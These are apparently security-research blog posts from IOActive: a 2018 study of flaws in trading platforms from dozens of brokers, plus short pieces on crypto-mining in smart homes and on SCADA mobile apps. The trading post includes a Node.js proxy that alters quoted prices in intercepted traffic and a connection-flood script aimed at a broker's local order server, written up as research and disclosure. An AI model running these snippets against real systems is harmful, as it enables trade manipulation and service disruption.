RESEARCH | August 7, 2018

Are You Trading Stocks Securely? Exposing Security Flaws in Trading Technologies

This blog post contains a small portion of the entire analysis. Please refer to the white paper for full details of the research.

Disclaimer

Most of the testing was performed using paper money (demo accounts) provided online by the brokerage houses. Only a few accounts were funded with real money for testing purposes. In the case of commercial platforms, the free trials provided by the brokers were used. Only end-user applications and their direct servers were analyzed. Other backend protocols and related technologies used in exchanges and financial institutions were not tested.

This research is not about High Frequency Trading (HFT), blockchain, or how to get rich overnight.

Introduction

The days of open outcry on trading floors of the NYSE, NASDAQ, and other stock exchanges around the globe are gone. With the advent of electronic trading platforms and networks, the exchange of financial securities is now easier and faster than ever, but this comes with inherent risks.


The valuable information, as well as the attack surface and vectors, in trading environments differs slightly from that in banking systems.

Brokerage houses offer trading platforms to operate in the market. These applications allow you to do things including, but not limited to:

  • Fund your account via bank transfers or credit card
  • Keep track of your available equity and buying power (cash and margin balances)
  • Monitor your positions (securities you own) and their performance (profit)
  • Monitor instruments or indexes
  • Send buy/sell orders
  • Create alerts or triggers to be executed when certain thresholds are reached
  • Receive real-time news or video broadcasts
  • Stay in touch with the trading community through social media and chats

Needless to say, every single item on the previous list must be kept secret and only known by and shown to its owner.

Scope

My analysis started in mid-2017 and concluded in July 2018. It encompassed the following platforms, many of them among the most widely used and well-known trading platforms, some of which allow cryptocurrency trading:

  • 16 Desktop applications
  • 34 Mobile apps
  • 30 Websites

These platforms are part of the trading solutions provided by the following brokers, which are used by tens of millions of traders. Some brokers offer all three types of platforms; however, in some cases only one or two were reviewed due to certain limitations:

  • Ally Financial
  • AvaTrade
  • Binance
  • Bitfinex
  • Bitso
  • Bittrex
  • Bloomberg
  • Capital One
  • Charles Schwab
  • Coinbase
  • easyMarkets
  • eSignal
  • ETNA
  • eToro
  • E-TRADE
  • ETX Capital
  • ExpertOption
  • Fidelity
  • Firstrade
  • FxPro
  • GBMhomebroker
  • Grupo BMV
  • IC Markets
  • Interactive Brokers
  • IQ Option
  • Kraken
  • Markets.com
  • Merrill Edge
  • MetaTrader
  • Net
  • NinjaTrader
  • OANDA
  • Personal Capital
  • Plus500
  • Poloniex
  • Robinhood
  • Scottrade
  • TD Ameritrade
  • TradeStation
  • Yahoo! Finance

Devices used:

  • Windows 7 (64-bit)
  • Windows 10 Home Single (64-bit)
  • iOS 10.3.3 (iPhone 6) [not jailbroken]
  • iOS 10.4 (iPhone 6) [not jailbroken]
  • Android 7.1.1 (Emulator) [rooted]

The review covered basic security controls and features, which represent just the tip of the iceberg compared to more exhaustive lists of security checks per platform.

Results

Unfortunately, the results proved to be much worse than those for retail banking applications. For example, mobile apps for trading are less secure than the personal banking apps reviewed in 2013 and 2015.

Apparently, cybersecurity has not been on the radar of the Financial Services Tech space in charge of developing trading apps. Security researchers have disregarded these technologies as well, probably because of a lack of understanding of money markets.

While testing I noted a basic correlation: the biggest brokers are the ones that invest more in fintech cybersecurity. Their products are more mature in terms of functionality, usability, and security.

Based on my testing results and opinion, the following trading platforms are the most secure:

  • TD Ameritrade: Web and mobile
  • Charles Schwab: Web and mobile
  • Merrill Edge: Web and mobile
  • MetaTrader 4/5: Desktop and mobile
  • Yahoo! Finance: Web and mobile
  • Robinhood: Web and mobile
  • Bloomberg: Mobile
  • TradeStation: Mobile
  • Capital One: Mobile
  • FxPro cTrader: Desktop
  • IC Markets cTrader: Desktop
  • Ally Financial: Web
  • Personal Capital: Web
  • Bitfinex: Web and mobile
  • Coinbase: Web and mobile
  • Bitso: Web and mobile

The medium- to high-risk vulnerabilities found on the different platforms include full or partial problems with encryption, denial of service, authentication, and/or session management. Although these platforms implement good security features, they also have areas that should be addressed to improve their security.

The following are the platforms that, in my opinion, must improve in terms of security:

  • Interactive Brokers: Desktop, web, and mobile
  • IQ Option: Desktop, web, and mobile
  • AvaTrade: Desktop and mobile
  • E-TRADE: Web and mobile
  • eSignal: Desktop
  • TD Ameritrade's Thinkorswim: Desktop
  • Charles Schwab: Desktop
  • TradeStation: Desktop
  • NinjaTrader: Desktop
  • Fidelity: Web
  • Firstrade: Web
  • Plus500: Web
  • Markets.com: Mobile

Unencrypted Communications

Unencrypted data transmission was observed in 9 desktop applications (64%) and in 2 mobile apps (6%). Most applications transmit most of their sensitive data encrypted; however, there were some cases where cleartext data could be seen in unencrypted requests.

Among the data seen unencrypted are passwords, balances, portfolios, personal information, and other trading-related data. In most cases of unencrypted transmission, plaintext HTTP was seen; in others, old proprietary protocols or other financial protocols such as FIX were used.

Under certain circumstances, an attacker with access to some part of the network, such as the router in a public WiFi, could see and modify information transmitted to and from the trading application. In the trading context, a malicious actor could intercept and alter values, such as the bid or ask prices of an instrument, and cause a user to buy or sell securities based on misleading information.
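
As a rough illustration of the risk, the following Node.js sketch (with a hypothetical hostname and JSON field; it is not taken from any of the reviewed platforms) shows how a machine that sits on the path of unencrypted HTTP traffic could rewrite a quoted price before it reaches the trading application:

const http = require('http');

// Forwarding proxy that tampers with plaintext HTTP traffic passing through it.
http.createServer((clientReq, clientRes) => {
  const upstream = http.request({
    host: 'quotes.example-broker.com',            // hypothetical unencrypted quote server
    path: clientReq.url,
    method: clientReq.method,
    headers: clientReq.headers,
  }, (upstreamRes) => {
    let body = '';
    upstreamRes.on('data', (chunk) => { body += chunk; });
    upstreamRes.on('end', () => {
      // Rewrite the quoted "ask" price before relaying the response to the victim.
      const forged = body.replace(/"ask":\s*[\d.]+/, '"ask": 999.99');
      const headers = Object.assign({}, upstreamRes.headers);
      delete headers['content-length'];           // body length changed; let Node recompute it
      clientRes.writeHead(upstreamRes.statusCode, headers);
      clientRes.end(forged);
    });
  });
  clientReq.pipe(upstream);
}).listen(8080);                                  // the victim's traffic must be routed through this host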

For example, the following application uses unencrypted HTTP. In the screenshot, a buy order:

Another interesting example was found in eSignal's Data Manager. eSignal is a well-known signal provider that integrates with a wide variety of trading platforms and acts as a source of market data. During testing, it was noted that Data Manager authenticates over an unencrypted protocol on TCP port 2189, apparently developed in 1999.

As can be seen, the copyright states it was developed in 1999 by Data Broadcasting Corporation. A quick search turned up an SEC document stating that the company changed its name to Interactive Data Corporation, the owner of eSignal. In other words, it looks like an in-house development created almost 20 years ago. We could not corroborate this information, though.

The main eSignal login screen also authenticates through a cleartext channel:

FIX (Financial Information eXchange) is a protocol initiated in 1992 and one of the industry-standard protocols for messaging and trade execution. Currently, it is used by a majority of exchanges and traders. There are guidelines on how to implement it over a secure channel; however, the binary version in cleartext was mostly seen. Tests against the protocol itself were not performed in this analysis.

A broker that supports FIX:

There are some cases where the application encrypts the communication channel except for certain features. For instance, Interactive Brokers desktop and mobile applications encrypt all communication except that used by iBot, the robot assistant that receives text or voice commands; iBot sends the instructions to the server embedded in a cleartext FIX protocol message:

News related to the positions was also observed in plaintext:

Another instance of an application that encrypts most channels but not all of them is Interactive Brokers for Android, where a diagnostics log with sensitive data is sent to the server on a scheduled basis over unencrypted HTTP:

A similar platform that sends everything over HTTPS is IQ Option, but for some reason, it sends duplicate unencrypted HTTP requests to the server disclosing the session cookie.

Others, such as Charles Schwab, appear to implement their own binary protocols; however, symbols in watchlists or quoted symbols could be seen in cleartext:

Interactive Brokers supports encryption but uses an insecure channel by default; an inexperienced user who does not know the meaning of "SSL" (Secure Sockets Layer) won't enable it on the login screen, and some sensitive data will be sent and received without encryption:

Passwords Stored Unencrypted

In 7 mobile apps (21%) and in 3 desktop applications (21%), the user's password was stored unencrypted in a configuration file or sent to log files. Local access to the computer or mobile device, either physical or through malware, is required to extract it.

In a hypothetical attack scenario, a malicious user could extract a password from the file system or the logging functionality without any in-depth know-how (it's relatively easy), log in through the broker's web-based trading platform, and perform unauthorized actions. They could sell stocks, transfer the money to a newly added bank account, and delete this bank account after the transfer is complete. During testing, I noticed that most web platforms (more than 75%) support two-factor authentication (2FA); however, it's not enabled by default, and the user must go to the configuration and enable it in order to receive authorization codes by text message or email. Hence, if 2FA is not enabled in the account, it's possible for an attacker who already knows the password to link a new bank account and withdraw the money from sold securities.

The following are some instances where passwords are stored locally unencrypted or sent to logs in cleartext:

Base64 is not encryption:
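
Any such "protection" is trivially reversible; for example, in Node.js (the stored value below is hypothetical):

// Base64 only encodes; it does not encrypt. Decoding needs no key at all.
const stored = 'czNjcjN0UGFzc3dvcmQh';                        // hypothetical value found in a config file
console.log(Buffer.from(stored, 'base64').toString('utf8'));  // -> s3cr3tPassword!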

In some cases, the password was sent to the server as a GET parameter, which is also insecure, since URLs and query strings commonly end up in server, proxy, and browser logs:

One PIN for login and unlocking the app was also seen:

In IQ Option, the password was stored completely unencrypted:

However, in a newer version, the password is encrypted in a configuration file, but is still stored in cleartext in a different file:

Trading and Account Information Stored Unencrypted

In the trading context, operational or strategic data must not be stored unencrypted nor sent to any log file in cleartext. This sensitive data encompasses values such as personal data, general balances, cash balance, margin balance, net worth, net liquidity, the number of positions, recently quoted symbols, watchlists, buy/sell orders, alerts, equity, buying power, and deposits. Additionally, sensitive technical values such as usernames, passwords, session IDs, URLs, and cryptographic tokens should not be exposed either.

8 desktop applications (57%) and 15 mobile apps (44%) sent sensitive data in cleartext to log files or stored it unencrypted. Local access to the computer or mobile device, either physical or through malware, is required to extract this data.

If these values are somehow leaked, a malicious user could gain insight into users’ net worth and investing strategy by knowing which instruments users have been looking for recently, as well as their balances, positions, watchlists, buying power, etc.

The following screenshots show applications that store sensitive data unencrypted:

Balances:

Investment portfolio:

Buy/sell orders:

Watchlists:

Recently quoted symbols:

Other data:

Trading Programming Languages with DLL Import Capabilities

This is not a bug, it’s a feature. Some trading platforms allow their customers to create their own automated trading robots (a.k.a. expert advisors), indicators, and other plugins. This is achieved through their own programming languages, which in turn are based on other languages, such as C++, C#, or Pascal.

The following are a few of the trading platforms with their own trading language:

  • MetaTrader: MetaQuotes Language (Based on C++ – Supports DLL imports)
  • NinjaTrader: NinjaScript (Based on C# – Supports DLL imports)
  • TradeStation: EasyLanguage (Based on Pascal – Supports DLL imports)
  • AvaTradeAct: ActFX (Based on Pascal – Does not support OS commands nor DLL imports)
  • (FxPro/IC Markets) cTrader: Based on C# (OS command and DLL support is unknown)

To their credit, some platforms such as MetaTrader warn their customers about the dangers related to DLL imports and advise them to execute plugins only from trusted sources. However, there are Internet tutorials claiming to "make you rich overnight" with certain trading robots they provide. These tutorials also give detailed instructions on how to install the robots in MetaTrader, including enabling the checkbox that allows DLL imports. Innocent, non-tech-savvy traders are likely to enable such controls, since not everyone knows what a DLL file is or what is being imported from it. Dangerous.

The following is a malicious Ichimoku indicator that, when loaded into any chart, downloads and executes a backdoor for remote access:

Another basic example is NinjaTrader, which simply allows OS commands through C#'s System.Diagnostics.Process.Start(). In the following screenshot, calc.exe is executed from the chart initialization routine:

Denial of Service

Many desktop platforms integrate with other trading software through common TCP/IP sockets. Nevertheless, some common weaknesses are present in the connection handling of such services.

A common error is not limiting the number of concurrent connections. If a TCP daemon does not limit concurrent connections, applications are susceptible to denial-of-service (DoS) or other types of attacks, depending on the nature of the application.

For example, TD Ameritrade's Thinkorswim TCP-Orders Server listens on TCP port 2000 on the localhost interface, and there is no limit on the number of connections nor a waiting time between orders. This leads to the following problems:

  • Memory leakage since, apparently, the resources assigned to every connection are not freed upon termination.
  • Continuous order pop-ups (one pop-up per order received through the TCP server) render the application useless.
  • A NULL pointer dereference is triggered and an error report (.zip file) is created.

It listens on the local interface only; regardless, there are different ways to reach this port, such as via XMLHttpRequest() in JavaScript through a web browser.

Memory leakage could be easily triggered by creating as many connections as possible:
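
A minimal sketch of that kind of test, using Node's built-in net module (port 2000 as described above; run it only against your own installation):

// dos-sketch.js - open as many TCP connections as possible against the local order server.
const net = require('net');

let opened = 0;
function connect() {
  const socket = net.connect({ host: '127.0.0.1', port: 2000 }, () => {
    opened++;
    if (opened % 100 === 0) console.log(`open connections: ${opened}`);
    connect(); // keep opening connections; none are ever closed
  });
  socket.on('error', (err) => console.log(`server stopped accepting after ${opened}: ${err.code}`));
}
connect();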

A similar DoS vulnerability due to memory exhaustion was found in eSignal's Data Manager. Since Data Manager acts as a source of market data for a wide variety of trading platforms, availability is its most important asset:

It's recommended to implement a configuration option that lets the user control the behavior of the TCP order server, such as the maximum number of orders accepted per minute as well as the number of seconds to wait between orders, to avoid bottlenecks.

The following capture from Interactive Brokers shows when this countermeasure is implemented properly. No more than 51 users can be connected simultaneously:
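
For reference, this kind of cap is simple to express with Node's built-in net module. The snippet below is a hypothetical illustration, not the broker's actual implementation, and a real order server would combine it with the per-minute rate limit suggested above:

// Minimal illustration of capping concurrent connections on a TCP daemon.
const net = require('net');

const server = net.createServer((socket) => {
  socket.on('data', (order) => {
    // ...parse and enqueue the order, enforcing a per-client rate limit here...
  });
});

server.maxConnections = 50;        // additional clients are refused instead of exhausting memory
server.listen(2000, '127.0.0.1');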

Session Still Valid After Logout

Normally, when the logout button is pressed in an app, the session is finished on both sides: server and client. Usually the server deletes the session token from its valid session list and sends a new empty or random value back to the client to clear or overwrite the session token, so the client needs to reauthenticate next time.

In some web platforms such as E-TRADE, Charles Schwab, Fidelity and Yahoo! Finance (Fixed), the session was still valid one hour after clicking the logout button:
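
For comparison, proper logout handling destroys the session server-side rather than only clearing it in the browser. A minimal sketch, assuming an Express application with express-session (not the code of any reviewed platform):

const express = require('express');
const session = require('express-session');

const app = express();
app.use(session({ secret: 'change-me', resave: false, saveUninitialized: false }));

app.post('/logout', (req, res) => {
  req.session.destroy(() => {            // remove the session from the server-side store
    res.clearCookie('connect.sid');      // overwrite the session cookie on the client
    res.redirect('/login');              // any further request must re-authenticate
  });
});

app.listen(3000);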

Authentication

While most web-based trading platforms support 2FA (+75%), most desktop applications do not implement it to authenticate their users, even when the web-based platform from the same broker supports it.

Nowadays, most modern smartphones support fingerprint-reading, and most trading apps use it to authenticate their customers. Only 8 apps (24%) do not implement this feature.

Unfortunately, using the fingerprint database in the phone has a downside:

Weak Password Policies

Some institutions let the users choose easily guessable passwords. For example:

The lack of a secure password policy increases the chances that a brute-force attack will succeed in compromising user accounts.

In some cases, such as in IQ Option and Markets.com, the password policy validation is implemented on the client-side only, hence, it is possible to intercept a request and send a weak password to the server:
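
Client-side validation is only a usability aid; the same policy has to be enforced again on the server, where a tampered request cannot bypass it. A minimal sketch with hypothetical policy values:

// Server-side password policy check; returns a reason string or null if acceptable.
function passwordPolicyError(password) {
  if (password.length < 12) return 'at least 12 characters required';
  if (!/[a-z]/.test(password) || !/[A-Z]/.test(password)) return 'mixed case required';
  if (!/[0-9]/.test(password)) return 'at least one digit required';
  if (/^(password|12345|qwerty)/i.test(password)) return 'commonly used password';
  return null; // acceptable
}

// Called in the registration / password-change handler, regardless of any client-side check:
console.log(passwordPolicyError('abc'));            // -> 'at least 12 characters required'
console.log(passwordPolicyError('Tr4ding-Is-Risky')); // -> null (accepted)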

Automatic Logout/Lockout for Idle Sessions

Most web-based platforms log out or lock out the user automatically after a period of inactivity, but this is not the case for desktop applications (43%) and mobile apps (25%). This security control forces the user to authenticate again after a period of idle time.

Privacy Mode

This mode protects the customers’ private information from being displayed on the screen in public areas where shoulder-surfing attacks are feasible. Most of the mobile apps, desktop applications, and web platforms do not implement this useful and important feature.

The following images show before and after enabling privacy mode in Thinkorswim for mobile:

Hardcoded Secrets in Code and App Obfuscation

16 Android .apk installers (47%) were easily reverse engineered to human-readable code, since they lack obfuscation. Most Java- and .NET-based desktop applications were also reverse engineered easily. The rest of the applications had medium to high levels of obfuscation, such as Merrill Edge in the next screenshot.

The goal of obfuscation is to conceal the application's purpose and logic (security through obscurity) in order to deter and complicate reverse engineering.

In the non-obfuscated platforms, there are hardcoded secrets such as cryptographic keys and third-party service partner passwords. This information could allow unauthorized access to other systems that are not under the control of the brokerage houses. For example, a Morningstar.com account (investment research) hardcoded in a Java class:

Interestingly, 14 of the mobile apps (41%) and 4 of the desktop platforms (29%) contain traces (hostnames and IPs) of the internal development and testing environments where they were built or tested. Some of these hostnames are reachable from the Internet, and since they are testing systems, they could lack proper protections.

SSL Certificate Validation

11 of the reviewed mobile apps (32%) do not check the authenticity of the remote endpoint by verifying its SSL certificate; therefore, it's feasible to perform man-in-the-middle (MiTM) attacks to eavesdrop on and tamper with data. Some MiTM attacks require tricking the user into installing a malicious certificate on their phone, though.

The apps that do verify the certificate normally refuse to transmit any data when it cannot be validated; however, only Charles Schwab allows the user to continue using the app with the certificate that was presented:
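
In TLS client code the difference often comes down to a single option. For example, with Node's https module (hypothetical endpoint), certificate validation is on by default and has to be explicitly disabled, which is the anti-pattern behind this class of finding:

const https = require('https');

// Secure default: the remote certificate chain is validated against trusted CAs,
// and the connection fails if a man-in-the-middle presents its own certificate.
https.get({ hostname: 'api.example-broker.com', path: '/v1/quotes' }, (res) => { /* ... */ });

// Anti-pattern: validation switched off, so an interception certificate is silently accepted.
https.get({ hostname: 'api.example-broker.com', path: '/v1/quotes',
            rejectUnauthorized: false },              // never ship this
          (res) => { /* ... */ });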

Lack of Anti-exploitation Mitigations

ASLR randomizes the virtual address space locations of dynamically loaded libraries. DEP disallows the execution of data pages. Stack canaries are used to detect whether the stack has been corrupted. These security features make it much more difficult for memory corruption bugs to be exploited to execute arbitrary code.

The majority of the desktop applications do not have these security features enabled in their final releases. In some cases, these features are enabled only in some components, not the entire application. In other cases, components that handle network connections also lack these flags.

Linux applications have similar protections. IQ Option for Linux does not enforce all of them on certain binaries.
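
For reference, these mitigations are normally enabled at build time. The flags below are the usual switches; this is a general sketch, not the build configuration of any reviewed product:

# MSVC (Windows desktop applications)
/DYNAMICBASE                      # ASLR
/NXCOMPAT                         # DEP
/GS                               # stack canaries (buffer security check)

# GCC/Clang (Linux builds such as the IQ Option client)
-fstack-protector-strong          # stack canaries
-fPIE -pie                        # position-independent executable, enables ASLR
-Wl,-z,relro,-z,now               # full RELRO
-D_FORTIFY_SOURCE=2 -O2           # fortified libc functions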

Other Weaknesses

More issues were found in the platforms. For more details, please refer to the white paper. 

Statistics

Since a picture is worth a thousand words, consider the following graphs:

For more statistics, please refer to the white paper.

Responsible Disclosure

One of IOActive's missions is to act responsibly when it comes to vulnerability disclosure. In September 2017, we sent a detailed report to 13 of the brokerage firms whose mobile trading apps presented some of the higher-risk vulnerabilities discussed in this paper. More recently, between May and July 2018, we sent additional vulnerability reports to brokerage firms.

As of July 27, 2018, 19 brokers that have medium- or high-risk vulnerabilities in any of their platforms were contacted.

TD Ameritrade and Charles Schwab were the brokers that communicated most with IOActive to resolve the reported issues.

For a table with the current status of the responsible disclosure process, please refer to the white paper.

Conclusions and Recommendations

  • Trading platforms are less secure than the applications seen in retail banking.
  • There’s still a long way to go to improve the maturity level of security in trading technologies.
  • End users should enable all the security mechanisms their platforms offer, such as 2FA and/or biometric authentication and automatic lockout/logout. Also, it’s recommended not to trade while connected to public networks and not to use the same password for other financial services.
  • Brokerage firms should perform regular internal audits to continuously improve the security of their trading platforms.
  • Brokerage firms should also offer security guidance in their online education centers.
  • Developers should analyze their current applications to determine if they suffer from the vulnerabilities described in this paper, and if so, fix them.
  • Developers should design new, more secure financial software following secure coding practices.
  • Regulators should encourage brokers to implement safeguards for a better trading environment. They could also create trading-specific guidelines to be followed by the brokerage firms and FinTech companies in charge of creating trading software.
  • Rating organizations should include security in their reviews.

Side Note

Remember: the stock market is not a casino where you magically get rich overnight. If you lack an understanding of how stocks or other financial instruments work, there is a high risk of losing money quickly. You must understand the market and its purpose before investing.

With nothing left to say, I wish you happy and secure trading!

Thanks for reading,

Alejandro
@nitr0usmx

This blog post contains a small portion of the entire analysis.
Please refer to the white paper.

EDITORIAL | January 24, 2018

Cryptocurrency and the Interconnected Home

There are many tiny elements to cryptocurrency that are not getting the awareness time they deserve. To start, the very thing that attracts people to cryptocurrency is also the very thing that is seemingly overlooked as a challenge. Cryptocurrencies are not backed by governments or institutions. The transactions allow the trader or investor to operate with anonymity. In the last year we have seen a massive increase in cyber bad guys hiding behind these inconspicuous transactions – ransomware demanding payment in bitcoin; bitcoin ATMs being used by various dealers to effectively clean money.

Because there are few regulations governing crypto trading, we cannot see whether cryptocurrency is being used to fund criminal or terrorist activity. There is an ancient funds transfer system, designed to avoid banks and ledgers, called Hawala. Hawala is believed to be the method by which terrorists are able to move money, anonymously, across borders with no governmental controls. Sound like what's happening with cryptocurrency? There's an old saying in law enforcement – follow the money. Good luck with that one.

Many people don't realize that cryptocurrencies depend on multiple miners. This allows the processing to be spread out and decentralized. Miners validate the integrity of the transactions and, as a result, receive a "block reward" for their efforts. But these rewards are cut in half every 210,000 blocks. The bitcoin block reward was 50 BTC when the network started in 2009; today it's 12.5. There are about 1.5 million bitcoins left to mine before the reward halves again.
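
The reward schedule itself is simple arithmetic; a rough JavaScript sketch of the halving rule:

// Bitcoin block subsidy: starts at 50 BTC and halves every 210,000 blocks.
function blockReward(height) {
  const halvings = Math.floor(height / 210000);
  return 50 / Math.pow(2, halvings);
}

console.log(blockReward(0));       // 50    (2009)
console.log(blockReward(420000));  // 12.5  (after the second halving, July 2016)
console.log(blockReward(630000));  // 6.25  (after the next halving)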

This limit on total bitcoins leads to an interesting issue – as the reward decreases, miners will switch their attention from bitcoin to other cryptocurrencies. This will reduce the number of miners, therefore making the network more centralized. This centralization creates greater opportunity for cyber bad guys to “hack” the network and wreak havoc, or for the remaining miners to monopolize the mining.

At some point, and we are already seeing the early stages of this, governments and banks will demand to implement more control. They will start to produce their own cryptocurrency. Would you trust these cryptos? What if your bank offered loans in Bitcoin, Ripple or Monero? Would you accept and use this type of loan?

Because it’s a limited resource, what happens when we reach the 21 million bitcoin limit? Unless we change the protocols, this event is estimated to happen by 2140.  My first response  – I don’t think bitcoins will be at the top of my concerns list in 2140.

The Interconnected Home

So what does crypto-mining malware or mineware have to do with your home? It’s easy enough to notice if your laptop is being overused – the device slows down, the battery runs down quickly. How can you tell if your fridge or toaster are compromised? With your smart home now interconnected, what happens if the cyber bad guys operate there? All a cyber bad guy needs is electricity, internet and CPU time. Soon your fridge will charge your toaster a bitcoin for bread and butter. How do we protect our unmonitored devices from this mineware? Who is responsible for ensuring the right level of security on your home devices to prevent this?

Smart home vulnerabilities present a real and present danger. We have already seen baby monitors, robots, and home security products, to name a few, all compromised. Most by IOActive researchers. There can be many risks that these compromises introduce to the home, not just around cryptocurrency. Think about how the interconnected home operates. Any device that’s SMART now has the three key ingredients to provide the cyber bad guy with everything he needs – internet access, power and processing.

Firstly, I can introduce my mineware via a compromised mobile phone and start to exploit the processing power of your home devices to mine bitcoin. How would you detect this? When could you detect this? At the end of the month, when you get an electricity bill. Instead of 50 pounds a month, it's now 150 pounds. But how do you diagnose the issue? You complain to the power company. They show you the usage. It's correct. Your home IS consuming that power.

They say that crypto mining is now using as much power as a small country. That’s got a serious impact on the power infrastructure as well as the environment. Ahhhh you say, I have a smart meter, it can give me a real time read out of my usage. Yes, it’s a computer. And, if I’m a cyber bad guy, I can make that computer tell me the latest football scores if I want. The key for a corporation when a cyber bad guy is attacking is to reduce dwell time. Detect and stop the bad guy from playing in your network. There are enterprise tools that can perform these tasks, but do you have these same tools at home? How would you Detect and React to a cyber bad guy attacking your smart home?

IOActive has proven these attack vectors over and over. We know this is possible and we know this is almost impossible to detect. Remember, a cyber bad guy makes several assessments when deciding on an attack – the risk of detection, the reward for the effort, and the penalty for capture. The risk of detection is low, like very low. The reward, well you could be mining blocks for months without stopping, that’s tens of thousands of dollars. And the penalty… what’s the penalty for someone hacking your toaster… The impact is measurable to the homeowner. This is real, and who’s to say not happening already. Ask your fridge!!

What’s the Answer –  Avoid Using Smart Home Devices Altogether?

No, we don't believe the best defense is to avoid adopting this new technology. The smart and interconnected home can offer its users fantastic opportunities. We believe that the responsibility rests with the manufacturer to ensure that devices are designed and built in a safe and secure way. And, yes, everything is designed; few things are designed well. IOActive researchers spend 99% of their time trying to identify vulnerabilities in these devices for the safety of everyone, not just corporations. The power is in the hands of the consumer. As soon as the consumer starts to purchase products based not only on their power efficiency, but on their security rating as well, then we will see a shift into a more secure home.

In the meantime, consider the entry point for most cyber bad guys. Generally, this is your desktop, laptop or mobile device. Therefore, ensure you have suitable security products running on these devices, make sure they are patched to the correct levels, be conscious of the websites you are visiting. If you control the available entry points, you will go a long way to protecting your home.
RESEARCH | January 11, 2018

SCADA and Mobile Security in the IoT Era

Two years ago, we assessed 20 mobile applications that worked with ICS software and hardware. At that time, mobile technologies were widespread, but Internet of Things (IoT) mania was only starting. Our research concluded the combination of SCADA systems and mobile applications had the potential to be a very dangerous and vulnerable cocktail. In the introduction of our paper, we stated “convenience often wins over security. Nowadays, you can monitor (or even control!) your ICS from a brand-new Android [device].”


Today, no one is surprised by the appearance of the Industrial Internet of Things (IIoT). The idea of putting your logging, monitoring, and even supervisory/control functions in the cloud does not sound as crazy as it did several years ago. If you look at mobile application offerings today, many more ICS-related applications are available than two years ago. Previously, we predicted that the "rapidly growing mobile development environment" would redeem the past sins of SCADA systems.
The purpose of our research is to understand how the landscape has evolved and assess the security posture of SCADA systems and mobile applications in this new IIoT era.

SCADA and Mobile Applications
ICS infrastructures are heterogeneous by nature. They include several layers, each of which is dedicated to specific tasks. Figure 1 illustrates a typical ICS structure.

Figure 1: Modern ICS infrastructure including mobile apps

Mobile applications reside in several ICS segments and can be grouped into two general families: Local (control room) and Remote.


Local Applications

Local applications are installed on devices that connect directly to ICS devices in the field or process layers (over Wi-Fi, Bluetooth, or serial).

Remote Applications
Remote applications allow engineers to connect to ICS servers using remote channels, like the Internet, VPN-over-Internet, and private cell networks. Typically, they only allow monitoring of the industrial process; however, several applications allow the user to control/supervise the process. Applications of this type include remote SCADA clients, MES clients, and remote alert applications. 

In comparison to local applications belonging to the control room group, which usually operate in an isolated environment, remote applications are often installed on smartphones that use Internet connections or even on personal devices in organizations that have a BYOD policy. In other words, remote applications are more exposed and face different threats.

Typical Threats And Attacks

In this section, we discuss the typical threats to this heterogeneous landscape of applications and how attacks could be conducted. We also map the threats to the application types.
 
Threat Types
There are three main possible ICS threat types:
  • Unauthorized physical access to the device or “virtual” access to device data
  • Communication channel compromise (MiTM)
  • Application compromise

Table 1 summarizes the threat types.

Table 1: SCADA mobile client threat list
 
Attack Types
Based on the threats listed above, attacks targeting mobile SCADA applications can be sorted into two groups.
 
Directly/indirectly influencing an industrial process or industrial network infrastructure
This type of attack could be carried out by sending data that would be carried over to the field segment devices. Various methods could be used to achieve this, including bypassing ACL/permission checks, accessing credentials with the required privileges, or bypassing data validation.
 
Compromising a SCADA operator to unwillingly perform a harmful action on the system
The core idea is for the attacker to create environmental circumstances where a SCADA system operator could make incorrect decisions and trigger alarms or otherwise bring the system into a halt state.
 
Testing Approach
Similar to the research we conducted two years ago, our analysis and testing approach was based on the OWASP Mobile Top 10 2016. Each application was tested using the following steps:
  • Perform analysis and fill out the test checklist
  • Perform client and backend fuzzing
  • If needed, perform deep analysis with reverse engineering
We did not alter the fuzzing approach since the last iteration of this research. It was discussed in depth in our previous whitepaper, so its description is omitted for brevity.
We improved our test checklist for this assessment. It includes:
  • Application purpose, type, category, and basic information 
  • Permissions
  • Password protection
  • Application intents, exported providers, broadcast services, etc.
  • Native code
  • Code obfuscation
  • Presence of web-based components
  • Methods of authentication used to communicate with the backend
  • Correctness of operations with sessions, cookies, and tokens 
  • SSL/TLS connection configuration
  • XML parser configuration
  • Backend APIs
  • Sensitive data handling
  • HMI project data handling
  • Secure storage
  • Other issues
Reviewed Vendors
We analyzed 34 vendors in our research, randomly selecting  SCADA application samples from the Google Play Store. We did, however, favor applications for which we were granted access to the backend hardware or software, so that a wider attack surface could be tested.
 
Additionally, we excluded applications whose most recent update was before June 2015, since they were likely the subject of our previous work. We only retested them if there had been an update during the subsequent two years.
 
Findings
We identified 147 security issues in the applications and their backends. We classified each issue according to the OWASP Top Ten Mobile risks and added one additional category for backend software bugs.
 
Table 4 presents the distribution of findings across categories. The “Number of Issues” column reports the number of issues belonging to each category, while the “% of Apps” column reports how many applications have at least one vulnerability belonging to each category.
Table 4. Vulnerabilities statistics

In our white paper, we provide an in-depth analysis of each category, along with examples of the most significant vulnerabilities we identified. Please download the white paper for a deeper analysis of each of the OWASP category findings.

Remediation And Best Practices
In addition to the well-known recommendations covering the OWASP Top 10 and OWASP Mobile Top 10 2016 risks, there are several actions that could be taken by developers of mobile SCADA clients to further protect their applications and systems.

In the following list, we gathered the most important items to consider when developing a mobile SCADA application:

  • Always keep in mind that your application is a gateway to your ICS systems. This should influence all of your design decisions, including how you handle the inputs you will accept from the application and, more generally, anything that you will accept and send to your ICS system.
  • Avoid all situations that could leave the SCADA operators in the dark or provide them with misleading information, from silent application crashes to full subverting of HMI projects.
  • Follow best practices. Consider covering the OWASP Top 10, OWASP Mobile Top 10 2016, and the 24 Deadly Sins of Software Security.
  • Do not forget to implement unit and functional tests for your application and the backend servers, to cover at a minimum the basic security features, such as authentication and authorization requirements.
  • Enforce password/PIN validation to protect against threats U1-3. In addition, avoid storing any credentials on the device using unsafe mechanisms (such as in cleartext) and leverage robust and safe storing mechanisms already provided by the Android platform.
  • Do not store sensitive data on SD cards or similar partitions without ACLs; such storage media cannot protect your sensitive data.
  • Provide secrecy and integrity for all HMI project data. This can be achieved by using authenticated encryption and storing the encryption credentials in the secure Android storage, or by deriving the key securely, via a key derivation function (KDF), from the application password, as in the sketch after this list.
  • Encrypt all communication using strong protocols, such as TLS 1.2 with elliptic curve key exchange and signatures and AEAD encryption schemes. Follow best practices, and keep updating your application as best practices evolve. Attacks always get better, and so should your application.
  • Catch and handle exceptions carefully. If an error cannot be recovered, ensure the application notifies the user and quits gracefully. When logging exceptions, ensure no sensitive information is leaked to log files.
  • If you are using Web Components in the application, think about preventing client-side injections (e.g., encrypt all communications, validate user input, etc.).
  • Limit the permissions your application requires to the strict minimum.
  • Implement obfuscation and anti-tampering protections in your application.
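
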